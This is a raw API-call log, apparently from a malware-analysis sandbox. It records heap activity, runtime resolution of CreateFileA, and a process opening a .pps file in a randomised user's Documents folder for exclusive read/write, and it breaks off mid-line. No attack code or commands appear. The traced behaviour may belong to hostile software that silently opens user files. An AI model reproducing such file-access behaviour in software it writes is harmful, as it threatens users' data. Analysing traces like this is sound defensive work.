[0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.222] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.222] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.223] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.223] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.224] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.226] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba0f0 [0178.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba0f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0178.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.227] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0178.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba0f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.227] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0178.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0178.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0178.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42) returned 0x9aa4f8 [0178.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", cchWideChar=66, lpMultiByteStr=0x9aa4f8, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpUsedDefaultChar=0x0) returned 66 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.229] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\isutz.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x84) returned 0x8feba8 [0178.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=66, lpWideCharStr=0x8feba8, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps") returned 66 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.234] HeapFree (in: hHeap=0x8a0000, 